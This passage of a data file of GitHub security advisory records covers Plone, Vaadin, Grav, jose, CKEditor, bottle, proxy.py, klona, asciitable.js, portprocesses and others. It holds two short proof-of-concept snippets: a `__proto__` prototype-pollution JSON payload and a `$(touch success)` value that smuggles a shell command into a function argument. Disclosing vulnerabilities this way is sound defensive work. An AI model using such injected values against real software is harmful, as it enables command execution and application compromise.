+If you are using a Solidity library that checks `RETURNDATASIZE` of an external call to a forwarder proxy deployed prior to this patch, it will fail on that assertion (such as `SafeERC20.safeTransfer`). The workaround is to always do a greater than or equal to check, rather than a strict equals to check.",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'vyper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/security/advisories/GHSA-375m-5fvv-xq23'}, {'type': 'WEB', 'url': 'https://github.com/vyperlang/vyper/pull/2281'}, {'type': 'WEB', 'url': 'https://pypi.org/project/vyper/'}]","{'cwe_ids': ['CWE-20'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:17:39Z', 'nvd_published_at': None}"
+1.4.0,GHSA-wq6x-g685-w5f2,2021-04-07T19:34:40Z,2021-04-07T21:13:00Z,,['CVE-2020-28734'],Improper Restriction of XML External Entity Reference in Plone,Plone before 5.2.3 allows XXE attacks via a feature that is explicitly only available to the Manager role.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Plone'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'plone.app.event'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.10'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'plone.app.theming'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.1.6'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'plone.app.dexterity'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.8'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'plone.supermodel'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28734'}, {'type': 'WEB', 'url': 'https://github.com/plone/Products.CMFPlone/issues/3209'}, {'type': 'WEB', 'url': 'https://dist.plone.org/release/5.2.3/RELEASE-NOTES.txt'}]","{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T19:34:40Z', 'nvd_published_at': '2020-12-30T19:15:00Z'}"
+1.4.0,GHSA-p7jq-v8jp-j424,2021-04-16T23:15:49Z,2021-04-19T14:50:38Z,,['CVE-2021-31406'],Timing side channel vulnerability in endpoint request handler in Vaadin 15-19,"Non-constant-time comparison of CSRF tokens in endpoint request handler in `com.vaadin:flow-server` versions 3.0.0 through 5.0.3 (Vaadin 15.0.0 through 18.0.6), and com.vaadin:fusion-endpoint version 6.0.0 (Vaadin 19.0.0) allows attacker to guess a security token for Fusion endpoints via timing attack.
+
+- https://vaadin.com/security/cve-2021-31406","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '5.0.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.1'}]}], 'versions': ['6.0.0']}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/flow/security/advisories/GHSA-p7jq-v8jp-j424'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31406'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/pull/10157'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-31406'}]","{'cwe_ids': ['CWE-203', 'CWE-208'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:15:49Z', 'nvd_published_at': '2021-04-23T16:15:00Z'}"
+1.4.0,GHSA-867q-77cc-98mv,2021-05-10T19:29:52Z,2021-04-29T21:51:37Z,,['CVE-2021-21429'],Creation of Temporary File in Directory with Insecure Permissions in the OpenAPI Generator Maven plugin,"### Impact
+
+Using `File.createTempFile` in JDK will result in creating and using insecure temporary files that can leave application and system data vulnerable to attacks. This vulnerability only impacts unix-like systems where the local system temporary directory is shared between all users. This vulnerability does not impact Windows or modern versions of MacOS.
+
+OpenAPI Generator Maven plug-in creates insecure temporary files during the code generation process. It creates insecure temporary files to store the OpenAPI specification files provided by the users and these temporary files can be read by any users in the system.
+
+The impact of this vulnerability is information disclosure of the contents of the specification file to other local users.
+
+### Patches
+The issue has been patched with `Files.createTempFile` and released in the v5.1.0 stable version.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [OpenAPI Generator Github repo](https://github.com/openAPITools/openapi-generator/)
+* Email us at [security@openapitools.org](mailto:security@openapitools.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.openapitools:openapi-generator-maven-plugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/OpenAPITools/openapi-generator/security/advisories/GHSA-867q-77cc-98mv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21429'}, {'type': 'WEB', 'url': 'https://github.com/OpenAPITools/openapi-generator/pull/8795'}, {'type': 'WEB', 'url': 'https://github.com/OpenAPITools/openapi-generator/blob/06ad7a51eff04393203cfa715e54e1fb59d984fe/modules/openapi-generator-maven-plugin/src/main/java/org/openapitools/codegen/plugin/CodeGenMojo.java#L782-L799'}]","{'cwe_ids': ['CWE-377', 'CWE-378', 'CWE-379', 'CWE-552'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-27T19:58:51Z', 'nvd_published_at': '2021-04-27T20:15:00Z'}"
+1.4.0,GHSA-g8r4-p96j-xfxc,2022-08-11T00:01:25Z,2021-04-16T19:53:12Z,,['CVE-2021-29440'],Grav's Twig processing allowing dangerous PHP functions by default,"### Impact
+
+Twig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages.
+As the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance.
+
+### Patches
+
+The issue was addressed by preventing dangerous functions from being called in Twig templates. A configuration option has been added to manually allow arbitrary PHP functions (`system.twig.safe_functions`) and filters (`system.twig.safe_filters`).
+
+Futures major versions of Grav may disable this functionality by default.
+
+### Workarounds
+
+Blocking access to the `/admin` path from untrusted sources will reduce the probability of exploitation.
+
+### References
+
+- https://portswigger.net/research/server-side-template-injection
+- https://blog.sonarsource.com/grav-cms-code-execution-vulnerabilities
+
+### For more information
+
+If you have any questions or comments about this advisory, you can contact:
+ - The original reporters, by sending an email to vulnerability.research [at] sonarsource.com;
+ - The maintainers, by opening an issue on this repository.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'getgrav/grav'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.7.10'}}]","[{'type': 'WEB', 'url': 'https://github.com/getgrav/grav/security/advisories/GHSA-g8r4-p96j-xfxc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29440'}, {'type': 'WEB', 'url': 'https://blog.sonarsource.com/grav-cms-code-execution-vulnerabilities'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/getgrav/grav'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/162987/Grav-CMS-1.7.10-Server-Side-Template-Injection.html'}]","{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-13T19:55:46Z', 'nvd_published_at': '2021-04-13T20:15:00Z'}"
+1.4.0,GHSA-94hh-pjjg-rwmr,2023-03-17T17:49:50Z,2021-04-19T14:58:49Z,,['CVE-2021-29444'],Padding Oracle Attack due to Observable Timing Discrepancy in jose-browser-runtime,"### Impact
+
+[AES_CBC_HMAC_SHA2 Algorithm](https://tools.ietf.org/html/rfc7518#section-5.2) (A128CBC-HS256, A192CBC-HS384, A256CBC-HS512) decryption would always execute both HMAC tag verification and CBC decryption, if either failed `JWEDecryptionFailed` would be thrown. But a possibly observable difference in timing when padding error would occur while decrypting the ciphertext makes a padding oracle and an adversary might be able to make use of that oracle to decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block).
+
+### Patches
+
+A patch was released which ensures the HMAC tag is verified before performing CBC decryption. The fixed versions are `>=3.11.4`.
+
+Users should upgrade to `^3.11.4`.
+
+### Credits
+Thanks to Morgan Brown of Microsoft for bringing this up and Eva Sarafianou (@esarafianou) for helping to score this advisory.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jose-browser-runtime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.11.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/panva/jose/security/advisories/GHSA-94hh-pjjg-rwmr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29444'}, {'type': 'PACKAGE', 'url': 'https://github.com/panva/jose'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/jose-browser-runtime'}]","{'cwe_ids': ['CWE-203'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:00:49Z', 'nvd_published_at': '2021-04-16T22:15:00Z'}"
+1.4.0,GHSA-rj44-gpjc-29r7,2021-03-30T20:20:04Z,2021-04-06T17:22:41Z,,['CVE-2021-21412'],[thi.ng/egf] Potential arbitrary code execution of `#gpg`-tagged property values,"### Impact
+
+Potential for arbitrary code execution in `#gpg`-tagged property values (only if `decrypt: true` option is enabled)
+
+### Patches
+
+[A fix](https://github.com/thi-ng/umbrella/commit/3e14765d6bfd8006742c9e7860bc7d58ae94dfa5) has already been released as v0.4.0
+
+### Workarounds
+
+By default, EGF parse functions do NOT attempt to decrypt values (since GPG is only available in non-browser env).
+
+However, if GPG encrypted values are used/required:
+
+1. Perform a regex search for `#gpg`-tagged values in the EGF source file/string and check for backtick (\`) chars in the encrypted value string
+2. Replace/remove them or skip parsing if present...
+
+### References
+
+https://github.com/thi-ng/umbrella/security/advisories/GHSA-rj44-gpjc-29r7#advisory-comment-65261
+
+### For more information
+
+If you have any questions or comments about this advisory, please open an issue in the [thi.ng/umbrella repo](https://github.com/thi-ng/umbrella/issues), of which this package is part of.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@thi.ng/egf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/thi-ng/umbrella/security/advisories/GHSA-rj44-gpjc-29r7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21412'}, {'type': 'WEB', 'url': 'https://github.com/thi-ng/umbrella/commit/88f61656e5f5cfba960013b8133186389efaf243'}, {'type': 'WEB', 'url': 'https://github.com/thi-ng/umbrella/blob/develop/packages/egf/CHANGELOG.md#040-2021-03-27'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@thi.ng/egf'}]","{'cwe_ids': ['CWE-78'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-30T17:40:22Z', 'nvd_published_at': '2021-03-30T18:15:00Z'}"
+1.4.0,GHSA-3rh3-wfr4-76mj,2021-04-30T17:30:42Z,2021-04-06T17:28:41Z,,['CVE-2021-21391'],Regular expression Denial of Service in multiple packages,"
+### Impact
+A regular expression denial of service (ReDoS) vulnerability has been discovered in multiple CKEditor 5 packages. The vulnerability allowed to abuse particular regular expressions, which could cause a significant performance drop resulting in a browser tab freeze. It affects all users using the CKEditor 5 packages listed above at version <= 26.0.0.
+
+### Patches
+The problem has been recognized and patched. The fix will be available in version 27.0.0.
+
+### For more information
+Email us at security@cksource.com if you have any questions or comments about this advisory.
+
+### Acknowledgements
+The CKEditor 5 team would like to thank Yeting Li for recognizing and reporting these vulnerabilities.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': '@ckeditor/ckeditor5-engine'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '27.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 26.0.0'}}, {'package': {'ecosystem': 'npm', 'name': '@ckeditor/ckeditor5-font'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '27.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 26.0.0'}}, {'package': {'ecosystem': 'npm', 'name': '@ckeditor/ckeditor5-image'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '27.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 26.0.0'}}, {'package': {'ecosystem': 'npm', 'name': '@ckeditor/ckeditor5-list'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '27.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 26.0.0'}}, {'package': {'ecosystem': 'npm', 'name': '@ckeditor/ckeditor5-markdown-gfm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '27.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 26.0.0'}}, {'package': {'ecosystem': 'npm', 'name': '@ckeditor/ckeditor5-media-embed'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '27.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 26.0.0'}}, {'package': {'ecosystem': 'npm', 'name': '@ckeditor/ckeditor5-paste-from-office'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '27.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 26.0.0'}}, {'package': {'ecosystem': 'npm', 'name': '@ckeditor/ckeditor5-widget'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '27.0.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 26.0.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/ckeditor/ckeditor5/security/advisories/GHSA-3rh3-wfr4-76mj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21391'}, {'type': 'WEB', 'url': 'https://github.com/ckeditor/ckeditor5/releases/tag/v27.0.0'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@ckeditor/ckeditor5-engine'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@ckeditor/ckeditor5-font'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@ckeditor/ckeditor5-image'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@ckeditor/ckeditor5-list'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@ckeditor/ckeditor5-markdown-gfm'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@ckeditor/ckeditor5-media-embed'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@ckeditor/ckeditor5-paste-from-office'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@ckeditor/ckeditor5-widget'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-31T18:37:46Z', 'nvd_published_at': '2021-04-29T01:15:00Z'}"
+1.4.0,GHSA-rfw2-x9f8-2f6m,2021-04-28T19:21:42Z,2021-04-30T17:27:53Z,,['CVE-2021-26722'],Cross-Site Scripting,"LinkedIn Oncall through 1.4.0 allows reflected XSS via /query because of mishandling of the ""No results found for"" message in the search bar.",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'oncall'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26722'}, {'type': 'WEB', 'url': 'https://github.com/linkedin/oncall/issues/341'}, {'type': 'WEB', 'url': 'https://github.com/linkedin/oncall/commit/843bc106a1c1b1699e9e52b6b0d01c7efe1d6225'}, {'type': 'WEB', 'url': 'https://pypi.org/project/oncall/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-28T19:21:42Z', 'nvd_published_at': '2021-02-05T18:15:00Z'}"
+1.4.0,GHSA-qhx9-7hx7-cp4r,2023-09-05T14:37:12Z,2021-04-07T21:05:21Z,,['CVE-2020-28473'],bottle HTTP Request smuggling,"The package bottle before 0.12.19 are vulnerable to Web Cache Poisoning by using a vector called parameter cloaking. When the attacker can separate query parameters using a semicolon (;), they can cause a difference in the interpretation of the request between the proxy (running with default configuration) and the server. This can result in malicious requests being cached as completely safe ones, as the proxy would usually not see the semicolon as a separator, and therefore would not include it in a cache key of an unkeyed parameter.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'bottle'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12.19'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28473'}, {'type': 'WEB', 'url': 'https://github.com/bottlepy/bottle/commit/57a2f22e0c1d2b328c4f54bf75741d74f47f1a6b'}, {'type': 'PACKAGE', 'url': 'https://github.com/bottlepy/bottle'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/01/msg00019.html'}, {'type': 'WEB', 'url': 'https://snyk.io/blog/cache-poisoning-in-popular-open-source-packages/'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PYTHON-BOTTLE-1017108'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T20:59:20Z', 'nvd_published_at': '2021-01-18T12:15:00Z'}"
+1.4.0,GHSA-cmc7-mfmr-xqrx,2021-04-06T21:58:49Z,2021-04-07T21:01:25Z,,['CVE-2021-3116'],Logic error in authentication in proxy.py,before_upstream_connection in AuthPlugin in http/proxy/auth.py in proxy.py before 2.3.1 accepts incorrect Proxy-Authorization header data because of a boolean confusion (and versus or).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'proxy.py'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3116'}, {'type': 'WEB', 'url': 'https://github.com/abhinavsingh/proxy.py/pull/482/commits/9b00093288237f5073c403f2c4f62acfdfa8ed46'}, {'type': 'WEB', 'url': 'https://cardaci.xyz/advisories/2021/01/10/proxy.py-2.3.0-broken-basic-authentication/'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-cmc7-mfmr-xqrx'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/proxy-py/PYSEC-2021-46.yaml'}, {'type': 'WEB', 'url': 'https://pypi.org/project/proxy.py/2.3.1/#history'}]","{'cwe_ids': ['CWE-287', 'CWE-480'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T21:58:49Z', 'nvd_published_at': '2021-01-11T05:15:00Z'}"
+1.4.0,GHSA-q74r-4xw3-ppx9,2021-04-16T23:15:34Z,2021-04-19T14:49:48Z,,['CVE-2019-25028'],Stored cross-site scripting in Grid component in Vaadin 7 and 8,"Missing variable sanitization in `Grid` component in `com.vaadin:vaadin-server` versions 7.4.0 through 7.7.19 (Vaadin 7.4.0 through 7.7.19), and 8.0.0 through 8.8.4 (Vaadin 8.0.0 through 8.8.4) allows attacker to inject malicious JavaScript via unspecified vector.
+
+- https://vaadin.com/security/cve-2019-25028","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.4.0'}, {'fixed': '7.7.20'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.8.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.4.0'}, {'fixed': '7.7.20'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.8.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/framework/security/advisories/GHSA-q74r-4xw3-ppx9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-25028'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/framework/pull/11644'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/framework/pull/11645'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2019-25028'}]","{'cwe_ids': ['CWE-79', 'CWE-80'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:15:34Z', 'nvd_published_at': '2021-04-23T16:15:00Z'}"
+1.4.0,GHSA-8f89-2fwj-5v5r,2021-03-30T16:22:33Z,2021-04-13T15:41:24Z,,['CVE-2020-8125'],Improper Input Validation in klona,Flaw in input validation in npm package klona version 1.1.0 and earlier may allow prototype pollution attack that may result in remote code execution or denial of service of applications using klona.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'klona'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.1.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8125'}, {'type': 'WEB', 'url': 'https://github.com/lukeed/klona/commit/200e8d1fd383a54790ee6fc8228264c21954e38e'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/778414'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-30T16:22:33Z', 'nvd_published_at': '2020-02-04T20:15:00Z'}"
+1.4.0,GHSA-2wqp-jmcc-mc77,2021-04-16T23:13:14Z,2021-04-19T14:47:34Z,,['CVE-2021-31405'],Regular expression denial of service (ReDoS) in EmailField component in Vaadin 14 and 15-17,"Unsafe validation RegEx in `EmailField` component in `com.vaadin:vaadin-text-field-flow` versions 2.0.4 through 2.3.2 (Vaadin 14.0.6 through 14.4.3), and 3.0.0 through 4.0.2 (Vaadin 15.0.0 through 17.0.10) allows attackers to cause uncontrolled resource consumption by submitting malicious email addresses.
+
+- https://vaadin.com/security/cve-2021-31405","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0.6'}, {'fixed': '14.4.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0.0'}, {'fixed': '17.0.11'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/platform/security/advisories/GHSA-2wqp-jmcc-mc77'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31405'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow-components/pull/442'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-31405'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:13:14Z', 'nvd_published_at': '2021-04-23T16:15:00Z'}"
+1.4.0,GHSA-5pxj-mhwj-x5gv,2023-09-11T18:53:26Z,2021-04-13T15:24:59Z,,['CVE-2020-7771'],Prototype Pollution in asciitable.js,"The package asciitable.js before 1.0.3 is vulnerable to Prototype Pollution via the main function.
+
+### PoC
+```js
+var a = require(""asciitable.js"");
+var b = JSON.parse('{""__proto__"":{""test"":123}}');
+a({},b);
+console.log({}.test)
+```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'asciitable.js'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7771'}, {'type': 'WEB', 'url': 'https://github.com/victornpb/asciitable.js/pull/1'}, {'type': 'WEB', 'url': 'https://github.com/victornpb/asciitable.js/commit/8db8fc5ffa7a2a6e8596709d99b200afb53f40ab'}, {'type': 'PACKAGE', 'url': 'https://github.com/victornpb/asciitable.js'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ASCIITABLEJS-1039799'}]","{'cwe_ids': ['CWE-400'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T23:32:45Z', 'nvd_published_at': '2021-01-04T12:15:00Z'}"
+1.4.0,GHSA-vm67-7vmg-66vm,2021-03-31T17:50:32Z,2021-04-06T17:24:50Z,,['CVE-2021-23348'],Arbitrary Command Injection in portprocesses,"### Impact
+
+An Arbitrary Command Injection vulnerability was reported in `portprocesses` impacting versions <= 1.0.4.
+
+### Example (Proof of Concept)
+
+The following example demonstrates the vulnerability and will run `touch success` therefore creating a file named `success`.
+
+```js
+const portprocesses = require(""portprocesses"");
+
+portprocesses.killProcess(""$(touch success)"");
+```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'portprocesses'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/rrainn/PortProcesses/security/advisories/GHSA-vm67-7vmg-66vm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23348'}, {'type': 'WEB', 'url': 'https://github.com/rrainn/PortProcesses/commit/86811216c9b97b01b5722f879f8c88a7aa4214e1'}, {'type': 'WEB', 'url': 'https://github.com/rrainn/PortProcesses/blob/fffceb09aff7180afbd0bd172e820404b33c8299/index.js%23L23'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PORTPROCESSES-1078536'}]","{'cwe_ids': ['CWE-77', 'CWE-78'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-31T17:50:32Z', 'nvd_published_at': '2021-03-31T15:15:00Z'}"
+1.4.0,GHSA-prmc-5v5w-c465,2021-03-31T18:09:39Z,2021-04-06T17:32:38Z,,[],Client TLS credentials sent raw to server in npm package nats,"Nats is a Node.js client for the NATS messaging system.
+
+## Problem Description
+
+_Preview versions_ of two NPM packages and one Deno package from the NATS project contain an information disclosure flaw, leaking options to the NATS server; for one package, this includes TLS private credentials.
+
+The _connection_ configuration options in these JavaScript-based implementations were fully serialized and sent to the server in the client's `CONNECT` message, immediately after TLS establishment.
+
+The nats.js client supports Mutual TLS and the credentials for the TLS client key are included in the connection configuration options; disclosure of the client's TLS private key to the server has been observed.
+
+Most authentication mechanisms are handled after connection, instead of as part of connection, so other authentication mechanisms are unaffected.
